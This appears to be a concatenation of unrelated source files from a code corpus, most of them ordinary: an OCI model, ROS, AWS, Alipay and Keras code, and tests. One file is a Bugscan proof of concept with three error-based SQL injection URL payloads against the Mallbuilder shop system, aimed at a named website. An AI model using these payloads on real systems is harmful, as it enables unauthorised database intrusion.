:param total_price: The total_price of this InvoiceLineSummary.
:type: float
"""
self._total_price = total_price
@property
def currency(self):
"""
Gets the currency of this InvoiceLineSummary.
:return: The currency of this InvoiceLineSummary.
:rtype: oci.osp_gateway.models.Currency
"""
return self._currency
@currency.setter
def currency(self, currency):
"""
Sets the currency of this InvoiceLineSummary.
:param currency: The currency of this InvoiceLineSummary.
:type: oci.osp_gateway.models.Currency
"""
self._currency = currency
def __repr__(self):
return formatted_flat_dict(self)
def __eq__(self, other):
if other is None:
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
return not self == other
| 2.375 | 2 |
building/smallCrater.py | cssidy/minecraft-hacks | 1 | 12759615 | from mcpi.minecraft import Minecraft
mc = Minecraft.create()
answer = input("Create a crater? Y/N ")
if answer == "Y":
pos = mc.player.getPos()
mc.setBlocks(pos.x + 1, pos.y + 1, pos.z + 1, pos.x - 1, pos.y - 1, pos.z - 1, 0)
mc.postToChat("Boom!")
| 2.890625 | 3 |
src/selfie_app_communication/scripts/app_communication.py | KNR-Selfie/selfie_carolocup2020 | 10 | 12759616 | #!/usr/bin/env python3
import rospy
import bluetooth as bt
import select
import threading
from std_srvs.srv import Empty
import dynamic_reconfigure.client
from struct import pack, unpack
class Communicator:
def __init__(self):
self.connections = []
self.port = 1
self.server_socket = bt.BluetoothSocket(bt.RFCOMM)
self.server_socket.bind(("", self.port))
self.server_socket.listen(7)
self.pidClient = dynamic_reconfigure.client.Client('controller')
self.server_socket.setblocking(False)
BTThread = threading.Thread(name="BTthread", target=self.BTfun)
self.resetVisionService = rospy.ServiceProxy('resetVision', Empty)
BTThread.start()
#a = rospy.get_param("~operations")
#print a
def BTfun(self):
while not rospy.is_shutdown():
readable, writable, xd = select.select(self.connections + [self.server_socket], self.connections, [], 0.01)
if self.server_socket in readable:
try:
remote_socket, (address,_) = self.server_socket.accept()
except bt.BluetoothError:
print "couldnt accept the connection"
except:
print "xd"
else:
print "connected to " + bt.lookup_name(address)
self.connections.append(remote_socket)
readable.remove(self.server_socket)
#endif
for read in readable:
try:
data = read.recv(5000)
print data[:3] == '\x01\x01\x01'
if data == "resetVision":
print data
self.resetVisionService()
elif data[:3]=='\x01\x01\x01':
self.pidClient.update_configuration({'Kp':float(unpack('f',data[3:])[0])})
elif data[:3] == '\x01\x01\x02':
self.pidClient.update_configuration({'Ki':float(unpack('f',data[3:])[0])})
elif data[:3] == '\x01\x01\x03':
self.pidClient.update_configuration({'Kd':float(unpack('f',data[3:])[0])})
except bt.BluetoothError:
print "disconnected"
self.connections.remove(read)
except:
print "xd"
else:
print "received " + data
rospy.init_node("omega")
communicator = Communicator()
rospy.spin()
| 2.609375 | 3 |
tests/test_batch.py | mohi7solanki/NZ-ORCID-Hub | 0 | 12759617 | <gh_stars>0
# -*- coding: utf-8 -*-
"""Tests for batch processing."""
from datetime import datetime
from unittest.mock import Mock, patch
import pytest
from flask_login import login_user
from peewee import Model, SqliteDatabase
from playhouse.test_utils import test_database
from orcid_hub import utils
from orcid_hub.models import (Affiliation, AffiliationRecord, ModelException, OrcidToken,
Organisation, OrgInfo, PartialDate, PartialDateField, Role, Task,
TaskType, User, UserOrg, UserOrgAffiliation, create_tables,
drop_tables)
def test_process_task_from_csv_with_failures(request_ctx):
"""Test task loading and processing with failures."""
org = Organisation.get(name="TEST0")
super_user = User.get(email="<EMAIL>")
with patch("emails.html") as mock_msg, request_ctx("/") as ctx:
login_user(super_user)
# flake8: noqa
task = Task.load_from_csv(
"""First name Last name email address Organisation Campus/Department City Course or Job title Start date End date Student/Staff
FNA LBA <EMAIL> TEST1 Research Funding Wellington Programme Manager - ORCID 2016-09 Staff
""",
filename="TEST.tsv",
org=org)
AffiliationRecord.update(is_active=True).where(
AffiliationRecord.task_id == task.id).execute()
mock_msg().send = Mock(side_effect=Exception("FAILED TO SEND EMAIL"))
utils.process_affiliation_records(10000)
rec = AffiliationRecord.select().where(AffiliationRecord.task_id == task.id).first()
assert "FAILED TO SEND EMAIL" in rec.status
assert rec.processed_at is not None
def test_upload_affiliation_with_wrong_country(request_ctx, mocker):
"""Test task loading and processing with failures."""
org = Organisation.get(name="TEST0")
super_user = User.get(email="<EMAIL>")
with request_ctx("/") as ctx:
exception = mocker.patch.object(ctx.app.logger, "exception")
login_user(super_user)
# flake8: noqa
with pytest.raises(ModelException):
task = Task.load_from_csv(
"""First name\tLast name\temail address\tOrganisation\tCampus/Department\tCity\tCourse or Job title\tStart date\tEnd date\tStudent/Staff\tCountry
FNA\tLBA\<EMAIL>\tTEST1\tResearch Funding\tWellington\tProgramme Manager - ORCID\t2016-09 19:00:00 PM\t\tStaff\tNO COUNTRY
""",
filename="TEST.tsv",
org=org)
# this should work:
task = Task.load_from_csv(
"""First name\tLast name\temail address\tOrganisation\tCampus/Department\tCity\tCourse or Job title\tStart date\tEnd date\tStudent/Staff\tCountry
FNA\tLBA\taaa.<EMAIL>.com\tTEST1\tResearch Funding\tWellington\tProgramme Manager - ORCID\t2016-09 19:00:00 PM\t\tStaff\t
""",
filename="TEST-2.tsv",
org=org)
rec = task.records.first()
assert rec.country is None
exception.assert_called_once()
def test_process_tasks(request_ctx):
"""Test expiration data setting and deletion of the exprired tasks."""
org = Organisation.get(name="TEST0")
super_user = User.get(email="<EMAIL>")
with patch("orcid_hub.utils.send_email") as send_email, request_ctx("/") as ctx:
login_user(super_user)
# flake8: noqa
task = Task.load_from_csv(
"""First name Last name email address Organisation Campus/Department City Course or Job title\tStart date End date Student/Staff\tCountry
FNA LBA <EMAIL> TEST1 Research Funding Wellington Programme Manager - ORCID 2016-09 Staff\tNew Zealand
""",
filename="TEST_TASK.tsv",
org=org)
Task.update(created_at=datetime(1999, 1, 1), updated_at=datetime(1999, 1, 1)).execute()
utils.process_tasks()
assert Task.select().count() == 1
assert not Task.select().where(Task.expires_at.is_null()).exists()
send_email.assert_called_once()
task = Task.select().first()
args, kwargs = send_email.call_args
assert "email/task_expiration.html" in args
assert kwargs["error_count"] == 0
hostname = ctx.request.host
assert kwargs["export_url"].endswith(
f"//{hostname}/admin/affiliationrecord/export/csv/?task_id={task.id}")
assert kwargs["recipient"] == (
super_user.name,
super_user.email,
)
assert kwargs["subject"] == "Batch process task is about to expire"
assert kwargs["task"] == task
# After the second go everything should be deleted
utils.process_tasks()
assert Task.select().count() == 0
# Funding processing task:
task = Task.create(
created_at=datetime(1999, 1, 1),
org=org,
filename="FUNDING.json",
created_by=super_user,
updated_by=super_user,
task_type=TaskType.FUNDING.value)
Task.update(updated_at=datetime(1999, 1, 1)).execute()
assert Task.select().where(Task.expires_at.is_null()).count() == 1
utils.process_tasks()
assert Task.select().count() == 1
assert Task.select().where(Task.expires_at.is_null()).count() == 0
utils.process_tasks()
assert Task.select().count() == 0
args, kwargs = send_email.call_args
assert "email/task_expiration.html" in args
assert kwargs["error_count"] == 0
hostname = ctx.request.host
assert kwargs["export_url"].endswith(
f"//{hostname}/admin/fundingrecord/export/csv/?task_id={task.id}")
assert kwargs["recipient"] == (
super_user.name,
super_user.email,
)
assert kwargs["subject"] == "Batch process task is about to expire"
assert kwargs["task"] == task
# Incorrect task type:
task = Task.create(
created_at=datetime(1999, 1, 1),
org=org,
filename="ERROR.err",
created_by=super_user,
updated_by=super_user,
task_type=-12345)
Task.update(updated_at=datetime(1999, 1, 1)).execute()
with pytest.raises(Exception, message="Unexpeced task type: -12345 (ERROR.err)."):
utils.process_tasks()
task.delete().execute()
# Cover case with an exterenal SP:
with patch("orcid_hub.utils.EXTERNAL_SP", "SOME.EXTERNAL.SP"):
Task.create(
created_at=datetime(1999, 1, 1),
org=org,
filename="FILE.file",
created_by=super_user,
updated_by=super_user)
Task.update(updated_at=datetime(1999, 1, 1)).execute()
assert Task.select().count() == 1
utils.process_tasks()
utils.process_tasks()
assert Task.select().count() == 0
| 2.265625 | 2 |
src/spaceone/inventory/connector/aws_sqs_connector/connector.py | xellos00/plugin-aws-cloud-services | 2 | 12759618 | import time
import logging
from typing import List
import json
from spaceone.inventory.connector.aws_sqs_connector.schema.data import QueData, RedrivePolicy
from spaceone.inventory.connector.aws_sqs_connector.schema.resource import SQSResponse, QueResource
from spaceone.inventory.connector.aws_sqs_connector.schema.service_type import CLOUD_SERVICE_TYPES
from spaceone.inventory.libs.connector import SchematicAWSConnector
_LOGGER = logging.getLogger(__name__)
class SQSConnector(SchematicAWSConnector):
service_name = 'sqs'
def get_resources(self) -> List[SQSResponse]:
print("** SQS START **")
resources = []
start_time = time.time()
collect_resource = {
'request_method': self.request_data,
'resource': QueResource,
'response_schema': SQSResponse
}
# init cloud service type
for cst in CLOUD_SERVICE_TYPES:
resources.append(cst)
# merge data
for region_name in self.region_names:
self.reset_region(region_name)
resources.extend(self.collect_data_by_region(self.service_name, region_name, collect_resource))
print(f' SQS Finished {time.time() - start_time} Seconds')
return resources
def request_data(self, region_name) -> List[QueData]:
resource = self.session.resource('sqs')
for que in resource.queues.all():
attr = que.attributes
if 'RedrivePolicy' in attr:
attr['RedrivePolicy'] = RedrivePolicy(json.loads(attr.get('RedrivePolicy')), strict=False)
result = QueData(attr)
result.region_name = region_name
result.url = que.url
result.account_id = self.account_id
yield result, result.name
| 2.125 | 2 |
bin/_context.py | sjtuzyk/chandra-acis-analysis | 3 | 12759619 | <gh_stars>1-10
# Copyright (c) 2017 <NAME> <<EMAIL>>
# MIT license
"""
Portal to 'acispy' module/package
"""
import os
import sys
sys.path.insert(
0,
os.path.abspath(os.path.join(os.path.dirname(__file__), ".."))
)
import acispy
| 1.296875 | 1 |
stcSeg/checkpoint/__init__.py | ylqi/STC-Seg | 0 | 12759620 | <filename>stcSeg/checkpoint/__init__.py
from .stcseg_checkpoint import STCSegCheckpointer
__all__ = ["STCSegCheckpointer"]
| 1.140625 | 1 |
Bugscan_exploits-master/exp_list/exp-1888.py | csadsl/poc_exp | 11 | 12759621 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#POC Name :Mallbuilder商城系统注入之二,三,四
#Author : a
#mail : <EMAIL>
#Referer : http://www.wooyun.org/bugs/wooyun-2014-080751
def assign(service, arg):
if service == "mallbuilder":
return True, arg
def audit(arg):
payloads=['?m=product&s=list&key=%27%20and%201=updateXml%281,concat%280x5c,md5%283.14%29%29,1%29%23',
'?m=shop&id=&province=%27%20and%201=updatexml%281,concat%280x5c,md5%283.14%29%29,1%29%23',
'?m=product&s=list&ptype=0%27%20%20and%201=updatexml%281,concat%280x5c,md5%283.14%29%29,1%29%23']
for payload in payloads:
url = arg + payload
code, head, res, errcode,finalurl = curl.curl2(url)
if code == 200 and "4beed3b9c4a886067de0e3a094246f7" in res:
security_hole(url)
if __name__ == '__main__':
from dummy import *
audit(assign('mallbuilder', 'http://www.eseein.com/')[1]) | 2.1875 | 2 |
querybuilder/views.py | jgeskens/bo-querybuilder | 0 | 12759622 | from __future__ import unicode_literals
import importlib
import inspect
import json
from django.conf import settings
from django.contrib import messages
from django.db.models.base import ModelBase
from django.http.response import HttpResponse
from django.shortcuts import get_object_or_404
from django.utils.text import slugify
from django.utils.timezone import now
from django.utils.translation import ugettext
from advanced_reports.backoffice.base import BackOfficeView
from .models import SavedQuery
from .builder import QueryBuilder
class QueryBuilderView(BackOfficeView):
template = 'backoffice/views/querybuilder.html'
def __init__(self):
qb_models = self.get_models_from_settings()
self.qb = QueryBuilder(models=qb_models)
def get_models_from_settings(self):
model_paths = getattr(settings, 'QUERYBUILDER_MODELS', [])
qb_models = []
for model_path in model_paths:
module_path, model_name = model_path.rsplit('.', 1)
module = importlib.import_module(module_path)
if model_name == '*':
model_classes = inspect.getmembers(module, lambda c: type(c) == ModelBase)
for model_tuple in model_classes:
qb_models.append(getattr(module, model_tuple[0]))
else:
model = getattr(module, model_name)
qb_models.append(model)
return qb_models
def get_models(self, request):
return self.qb.get_models()
def execute_query(self, request):
id = request.action_params.get('id')
query = request.action_params.get('query')
if id is not None:
sq = SavedQuery.objects.get(pk=int(id))
sq.last_run = now()
sq.save()
return self.qb.run(query)
def save_query(self, request):
query = request.action_params.get('query')
name = request.action_params.get('name')
existing_id = request.action_params.get('id')
if existing_id is not None:
sq = SavedQuery.objects.get(pk=existing_id)
sq.name = name
sq.query = json.dumps(query, indent=2)
sq.save()
else:
sq = SavedQuery.objects.create(
name=name,
query=json.dumps(query, indent=2),
created_by=request.user
)
messages.success(request, ugettext('Successfully saved query "%s"') % name)
return sq.serialize()
def get_saved_queries(self, request):
queries = SavedQuery.objects.filter(created_by=request.user).order_by('-last_run')
return {'queries': [query.serialize() for query in queries]}
def delete_query(self, request):
id = request.action_params.get('id')
sq = SavedQuery.objects.get(pk=int(id))
sq.delete()
messages.success(request, ugettext('Successfully deleted query "%s"') % sq.name)
def export_to_excel(self, request):
id = int(request.GET.get('id'))
sq = get_object_or_404(SavedQuery, pk=int(id))
query = json.loads(sq.query)
result = self.qb.run(query, stream=True)
import xlsxwriter
import StringIO
output = StringIO.StringIO()
wb = xlsxwriter.Workbook(filename=output, options=dict(in_memory=True))
ws = wb.add_worksheet()
for c, value in enumerate(query['values']):
ws.write(0, c, value.get('label', value['expression']))
ws.set_column(0, len(query['values'])-1, width=20)
for r, obj in enumerate(result['objects']):
for c, value in enumerate(query['values']):
ws.write(r + 1, c, obj[value['expression']])
wb.close()
output.seek(0)
filename = '%s.xlsx' % slugify(sq.name)
response = HttpResponse()
response['Content-Disposition'] = 'attachment; filename="%s"' % filename
response['Content-Type'] = 'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
response.write(output.read())
return response
| 2 | 2 |
src/installer/src/tortuga/boot/distro/redhat/centos7.py | sutasu/tortuga | 33 | 12759623 | # Copyright 2008-2018 Univa Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import subprocess
from typing import Dict
from jinja2 import Template
from tempfile import NamedTemporaryFile, TemporaryDirectory
from .base import RedHatFamily, RedHatFamilyPrimitives, REPO_CONFIGURATION_TEMPLATE
class CentOs7Primitives(RedHatFamilyPrimitives):
"""
Represent locations of needed primitives
from the CentOS 7 distributions.
"""
def __new__(cls) -> Dict[str, str]:
"""
:return: None
"""
return super(CentOs7Primitives, cls).__new__(cls, rpm_gpg_key='<KEY>')
class CentOs7(RedHatFamily):
"""
Represents a CentOS 7 distribution.
"""
__abstract__: bool = False
def __init__(self, source_path: str, architecture: str = 'x86_64') -> None:
"""
:param source_path: String local path or remote uri
:param architecture: String targeted architecture
:returns: None
"""
super(CentOs7, self).__init__(
source_path,
'centos',
7,
0,
architecture
)
self._primitives: CentOs7Primitives = CentOs7Primitives()
def _update_version(self) -> None:
"""
:return: None
"""
template: Template = Template(REPO_CONFIGURATION_TEMPLATE)
if self.is_remote:
context: Dict[str, str] = {
'base_url': self._source_path,
'gpg_key': os.path.join(self._source_path, self._primitives['rpm_gpg_key'])
}
else:
context: Dict[str, str] = {
'base_url': 'file://{}'.format(self._source_path),
'gpg_key': 'file://{}'.format(os.path.join(self._source_path, self._primitives['rpm_gpg_key']))
}
rendered: str = template.render(context)
with TemporaryDirectory() as repo_directory:
with NamedTemporaryFile() as repo_configuration:
repo_configuration.write(rendered.encode())
repo_configuration.flush()
output: bytes = subprocess.check_output([
'yum',
'--disableplugin=*',
'--installroot', repo_directory,
'-c', repo_configuration.name,
'--disablerepo=*',
'--enablerepo=temp',
'info', 'centos-release'
])
if b'Release' in output:
for line in output.split(b'\n'):
if line.startswith(b'Version'):
major: int = int(line.split(b'Version : ')[1])
self.major: int = major
elif line.startswith(b'Release'):
minor: int = int(line.split(b'Release : ')[1].split(b'.')[0])
self.minor: int = minor
break
else:
raise RuntimeError('Could not update OS version')
| 1.84375 | 2 |
train/mbnet_keras.py | andriyadi/StarWars-Chars-AIClassifier | 6 | 12759624 | import glob, os, random
import keras
import numpy as np
from keras import backend as K
from keras.optimizers import Adam
from keras.metrics import categorical_crossentropy
from keras.preprocessing.image import ImageDataGenerator
from keras.preprocessing import image
from keras.models import Model
from keras.applications import imagenet_utils
from keras.layers import Dense, GlobalAveragePooling2D, Dropout
from keras.applications import MobileNet
from keras.applications.mobilenet import preprocess_input
import matplotlib.pyplot as plt
# Adjust these
NUM_CLASSES = 6
NAMES = ["cardboard", "glass", "metal", "paper", "plastic", "trash"]
IMAGE_WIDTH = 224
IMAGE_HEIGHT = 224
TRAINING_DIR = 'dataset/train'
VALIDATION_DIR = 'dataset/test'
img_list = glob.glob(os.path.join(TRAINING_DIR, '*/*.jpg'))
for i, img_path in enumerate(random.sample(img_list, 6)):
img = image.load_img(img_path, target_size=(224, 224))
img = image.img_to_array(img, dtype=np.uint8)
plt.subplot(2, 3, i+1)
plt.imshow(img.squeeze())
base_model=keras.applications.mobilenet.MobileNet(input_shape=(IMAGE_WIDTH, IMAGE_HEIGHT, 3), alpha = 0.75,depth_multiplier = 1, dropout = 0.001,include_top = False, weights = "imagenet", classes = 1000)
# Additional Layers
x=base_model.output
x=GlobalAveragePooling2D()(x)
x=Dense(128,activation='relu')(x) #we add dense layers so that the model can learn more complex functions and classify for better results.
x=Dropout(0.7)(x)
x=Dense(64, activation='relu')(x) #dense layer 3
preds=Dense(NUM_CLASSES, activation='softmax')(x) #final layer with softmax activation
model=Model(inputs=base_model.input,outputs=preds)
for i,layer in enumerate(model.layers):
print(i,layer.name)
# or if we want to set the first 20 layers of the network to be non-trainable
for layer in model.layers[:86]:
layer.trainable=False
for layer in model.layers[86:]:
layer.trainable=True
train_datagen=ImageDataGenerator(preprocessing_function=preprocess_input, validation_split=0.1) #included in our dependencies
# train_datagen = ImageDataGenerator( rescale = 1./255,
# rotation_range=45,
# width_shift_range=0.1,
# height_shift_range=0.1,
# shear_range=0.1,
# zoom_range=[0.9, 1.2],
# horizontal_flip=True,
# vertical_flip=False,
# fill_mode='constant',
# brightness_range=[0.7, 1.3])
train_generator=train_datagen.flow_from_directory(TRAINING_DIR,
target_size=(IMAGE_WIDTH,IMAGE_HEIGHT),
batch_size=16,
class_mode='categorical', subset='training',
seed=0
# save_to_dir='dataset/gen',
# save_prefix='gen-',
# save_format='jpeg'
)
validation_datagen = ImageDataGenerator(preprocessing_function=preprocess_input, validation_split=0.1)
# validation_datagen = ImageDataGenerator(rescale = 1./255,
# rotation_range=45,
# zoom_range=[0.9, 1.2],
# shear_range=0.1,)
validation_generator = validation_datagen.flow_from_directory(TRAINING_DIR,
target_size=(IMAGE_WIDTH,IMAGE_HEIGHT),
subset='validation', seed=0,
batch_size=16,
class_mode='categorical'
)
# model.summary()
model.compile(optimizer='adam',loss='categorical_crossentropy',metrics=['accuracy'])
# Adam optimizer, loss function will be categorical cross entropy, evaluation metric will be accuracy
step_size_train = (train_generator.n//train_generator.batch_size)
validation_steps = (validation_generator.n//validation_generator.batch_size)
model.fit_generator(generator=train_generator,
steps_per_epoch=step_size_train,
epochs=10,
#workers=4,
validation_data = validation_generator,
validation_steps = validation_steps,
verbose = 1)
model.save('garbageclassifier.h5')
#model.load_weights('logoclassifier.h5')
# def prepare_test_image(file):
# img_path = 'dataset/test/'
# img = image.load_img(img_path + file, target_size=(IMAGE_WIDTH, IMAGE_HEIGHT))
# img_array = image.img_to_array(img)
# img_array_expanded_dims = np.expand_dims(img_array, axis=0)
# return keras.applications.mobilenet.preprocess_input(img_array_expanded_dims)
# print("\n=========")
# preprocessed_image = prepare_test_image('01-dycodex/x0.jpg')
# predictions = model.predict(preprocessed_image)
# print("Dycode {0:.2f}".format(predictions[0][0]*100))
# print("DycodeX {0:.2f}".format(predictions[0][1]*100))
# predIdx = np.argmax(predictions, axis=1)[0]
# print("Prediction class: {:d} - {}".format(predIdx, NAMES[predIdx]))
# print("=========")
# preprocessed_image = prepare_test_image('02-adidas/a0.jpg')
# predictions = model.predict(preprocessed_image)
# print("Adidas {0:.2f}".format(predictions[0][2]*100))
# print("DycodeX {0:.2f}".format(predictions[0][1]*100))
# predIdx = np.argmax(predictions, axis=1)[0]
# print("Prediction class: {:d} - {}".format(predIdx, NAMES[predIdx]))
# print("=========")
# preprocessed_image = prepare_test_image('00-dycode/d0.jpg')
# predictions = model.predict(preprocessed_image)
# print("Adidas {0:.2f}".format(predictions[0][2]*100))
# print("Dycode {0:.2f}".format(predictions[0][0]*100))
# predIdx = np.argmax(predictions, axis=1)[0]
# print("Prediction class: {:d} - {}".format(predIdx, NAMES[predIdx]))
| 2.546875 | 3 |
nnrl/nn/modules/fully_connected.py | 0xangelo/nnrl | 0 | 12759625 | <reponame>0xangelo/nnrl<gh_stars>0
"""Neural network modules using fully connected hidden layers."""
from typing import Tuple
import torch
from torch import nn
from .linear import MaskedLinear
from .utils import get_activation
class FullyConnected(nn.Sequential):
"""Applies several fully connected modules to inputs."""
def __init__(
self,
in_features: int,
units: Tuple[int, ...] = (),
activation: str = None,
layer_norm: bool = False,
):
super().__init__()
self.in_features = in_features
activ = get_activation(activation)
units = (self.in_features,) + tuple(units)
modules = []
for in_dim, out_dim in zip(units[:-1], units[1:]):
modules.append(nn.Linear(in_dim, out_dim))
if layer_norm:
modules.append(nn.LayerNorm(out_dim))
if activ:
modules.append(activ())
self.out_features = units[-1]
self.sequential = nn.Sequential(*modules)
def forward(self, inputs: torch.Tensor) -> torch.Tensor:
# pylint:disable=arguments-differ,missing-function-docstring
return self.sequential(inputs)
class StateActionEncoder(nn.Module):
"""Concatenates action after the first layer."""
__constants__ = {"in_features", "out_features"}
def __init__(
self,
obs_dim: int,
action_dim: int,
delay_action: bool = True,
units: Tuple[int, ...] = (),
**fc_kwargs
):
super().__init__()
self.in_features = obs_dim + action_dim
if units:
if delay_action is True:
self.obs_module = FullyConnected(obs_dim, units=units[:1], **fc_kwargs)
input_dim = units[0] + action_dim
units = units[1:]
else:
self.obs_module = nn.Identity()
input_dim = obs_dim + action_dim
self.sequential_module = FullyConnected(input_dim, units=units, **fc_kwargs)
self.out_features = self.sequential_module.out_features
else:
self.obs_module = nn.Identity()
self.sequential_module = nn.Identity()
self.out_features = obs_dim + action_dim
def forward(self, obs: torch.Tensor, actions: torch.Tensor) -> torch.Tensor:
# pylint:disable=arguments-differ,missing-function-docstring
output = self.obs_module(obs)
output = torch.cat([output, actions], dim=-1)
output = self.sequential_module(output)
return output
class MADE(nn.Module):
"""MADE: Masked Autoencoder for Distribution Estimation
Implements a Masked Autoregressive MLP, where carefully constructed
binary masks over weights ensure the autoregressive property.
Based on: https://github.com/karpathy/pytorch-made
Args:
in_features: number of inputs
hidden sizes: number of units in hidden layers
out_features: number of outputs, which usually collectively parameterize
some kind of 1D distribution
natural_ordering: force natural ordering of dimensions,
don't use random permutations
Note: if out_features is e.g. 2x larger than `in_features` (perhaps the mean
and std), then the first `in_features` outputs will be all the means and
the remaining will be stds. I.e. output dimensions depend on the same
input dimensions in "chunks" and should be carefully decoded downstream.
"""
# pylint:disable=too-many-instance-attributes
def __init__(
self,
in_features: int,
units: Tuple[int, ...],
out_features: int,
natural_ordering: bool = False,
):
# pylint:disable=too-many-arguments
super().__init__()
self.in_features = in_features
self.out_features = out_features
assert (
self.out_features % self.in_features == 0
), "out_features must be integer multiple of in_features"
# define a simple MLP neural net
sizes = [in_features] + list(units) + [out_features]
# define input units ids
ids = [torch.arange(sizes[0]) if natural_ordering else torch.randperm(sizes[0])]
# define hidden units ids
for idx, size in enumerate(sizes[1:-1]):
ids.append(torch.randint(ids[idx].min().item(), out_features - 1, (size,)))
# copy output units ids from input units ids
ids.append(torch.cat([ids[0]] * (out_features // in_features), dim=-1))
# define masks for each layer
masks = [m.unsqueeze(-1) >= n.unsqueeze(0) for m, n in zip(ids[1:-1], ids[:-2])]
# last layer has a different connection pattern
masks.append(ids[-1].unsqueeze(-1) > ids[-2].unsqueeze(0))
linears = [MaskedLinear(hin, hout) for hin, hout in zip(sizes[:-1], sizes[1:])]
for linear, mask in zip(linears, masks):
linear.set_mask(mask)
layers = [m for layer in linears[:-1] for m in (layer, nn.LeakyReLU(0.2))]
layers += linears[-1:]
self.net = nn.Sequential(*layers)
def forward(self, inputs):
# pylint:disable=arguments-differ,missing-function-docstring
return self.net(inputs)
| 2.625 | 3 |
exercicios/aula8-ex016.py | anildoferreira/CursoPython-PyCharm | 0 | 12759626 | <reponame>anildoferreira/CursoPython-PyCharm<filename>exercicios/aula8-ex016.py
'''from math import trunc
num = float(input('Digite um número para mostrar sua porção: '))
print('a porção do seu número é: {}'.format(trunc(num)))'''
num = float(input('Digite um numero para se tornar uma integral zozinha: '))
print('o número flutuante {}, se tornou um número integral {:.0f}'.format(num, int(num)))
| 3.484375 | 3 |
alipay/aop/api/domain/KoubeiMerchantOperatorModifyModel.py | articuly/alipay-sdk-python-all | 0 | 12759627 | <gh_stars>0
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import simplejson as json
from alipay.aop.api.constant.ParamConstants import *
class KoubeiMerchantOperatorModifyModel(object):
def __init__(self):
self._auth_code = None
self._department_id = None
self._discount_limit_unit = None
self._discount_limit_value = None
self._free_limit_unit = None
self._free_limit_value = None
self._gender = None
self._job_type = None
self._mobile = None
self._operator_id = None
self._operator_name = None
self._role_id = None
@property
def auth_code(self):
return self._auth_code
@auth_code.setter
def auth_code(self, value):
self._auth_code = value
@property
def department_id(self):
return self._department_id
@department_id.setter
def department_id(self, value):
self._department_id = value
@property
def discount_limit_unit(self):
return self._discount_limit_unit
@discount_limit_unit.setter
def discount_limit_unit(self, value):
self._discount_limit_unit = value
@property
def discount_limit_value(self):
return self._discount_limit_value
@discount_limit_value.setter
def discount_limit_value(self, value):
self._discount_limit_value = value
@property
def free_limit_unit(self):
return self._free_limit_unit
@free_limit_unit.setter
def free_limit_unit(self, value):
self._free_limit_unit = value
@property
def free_limit_value(self):
return self._free_limit_value
@free_limit_value.setter
def free_limit_value(self, value):
self._free_limit_value = value
@property
def gender(self):
return self._gender
@gender.setter
def gender(self, value):
self._gender = value
@property
def job_type(self):
return self._job_type
@job_type.setter
def job_type(self, value):
self._job_type = value
@property
def mobile(self):
return self._mobile
@mobile.setter
def mobile(self, value):
self._mobile = value
@property
def operator_id(self):
return self._operator_id
@operator_id.setter
def operator_id(self, value):
self._operator_id = value
@property
def operator_name(self):
return self._operator_name
@operator_name.setter
def operator_name(self, value):
self._operator_name = value
@property
def role_id(self):
return self._role_id
@role_id.setter
def role_id(self, value):
self._role_id = value
def to_alipay_dict(self):
params = dict()
if self.auth_code:
if hasattr(self.auth_code, 'to_alipay_dict'):
params['auth_code'] = self.auth_code.to_alipay_dict()
else:
params['auth_code'] = self.auth_code
if self.department_id:
if hasattr(self.department_id, 'to_alipay_dict'):
params['department_id'] = self.department_id.to_alipay_dict()
else:
params['department_id'] = self.department_id
if self.discount_limit_unit:
if hasattr(self.discount_limit_unit, 'to_alipay_dict'):
params['discount_limit_unit'] = self.discount_limit_unit.to_alipay_dict()
else:
params['discount_limit_unit'] = self.discount_limit_unit
if self.discount_limit_value:
if hasattr(self.discount_limit_value, 'to_alipay_dict'):
params['discount_limit_value'] = self.discount_limit_value.to_alipay_dict()
else:
params['discount_limit_value'] = self.discount_limit_value
if self.free_limit_unit:
if hasattr(self.free_limit_unit, 'to_alipay_dict'):
params['free_limit_unit'] = self.free_limit_unit.to_alipay_dict()
else:
params['free_limit_unit'] = self.free_limit_unit
if self.free_limit_value:
if hasattr(self.free_limit_value, 'to_alipay_dict'):
params['free_limit_value'] = self.free_limit_value.to_alipay_dict()
else:
params['free_limit_value'] = self.free_limit_value
if self.gender:
if hasattr(self.gender, 'to_alipay_dict'):
params['gender'] = self.gender.to_alipay_dict()
else:
params['gender'] = self.gender
if self.job_type:
if hasattr(self.job_type, 'to_alipay_dict'):
params['job_type'] = self.job_type.to_alipay_dict()
else:
params['job_type'] = self.job_type
if self.mobile:
if hasattr(self.mobile, 'to_alipay_dict'):
params['mobile'] = self.mobile.to_alipay_dict()
else:
params['mobile'] = self.mobile
if self.operator_id:
if hasattr(self.operator_id, 'to_alipay_dict'):
params['operator_id'] = self.operator_id.to_alipay_dict()
else:
params['operator_id'] = self.operator_id
if self.operator_name:
if hasattr(self.operator_name, 'to_alipay_dict'):
params['operator_name'] = self.operator_name.to_alipay_dict()
else:
params['operator_name'] = self.operator_name
if self.role_id:
if hasattr(self.role_id, 'to_alipay_dict'):
params['role_id'] = self.role_id.to_alipay_dict()
else:
params['role_id'] = self.role_id
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = KoubeiMerchantOperatorModifyModel()
if 'auth_code' in d:
o.auth_code = d['auth_code']
if 'department_id' in d:
o.department_id = d['department_id']
if 'discount_limit_unit' in d:
o.discount_limit_unit = d['discount_limit_unit']
if 'discount_limit_value' in d:
o.discount_limit_value = d['discount_limit_value']
if 'free_limit_unit' in d:
o.free_limit_unit = d['free_limit_unit']
if 'free_limit_value' in d:
o.free_limit_value = d['free_limit_value']
if 'gender' in d:
o.gender = d['gender']
if 'job_type' in d:
o.job_type = d['job_type']
if 'mobile' in d:
o.mobile = d['mobile']
if 'operator_id' in d:
o.operator_id = d['operator_id']
if 'operator_name' in d:
o.operator_name = d['operator_name']
if 'role_id' in d:
o.role_id = d['role_id']
return o
| 1.828125 | 2 |
syma/__init__.py | rooterkyberian/syma | 3 | 12759628 | import operator
from functools import reduce
MSG_LEN = 27
IDLE = bytes.fromhex("436d640001001200010404000a000000808080802020202000550f")
CMD_PREFIX = IDLE[:-11]
def _c(cmd: str) -> bytes:
data = bytes.fromhex(cmd)
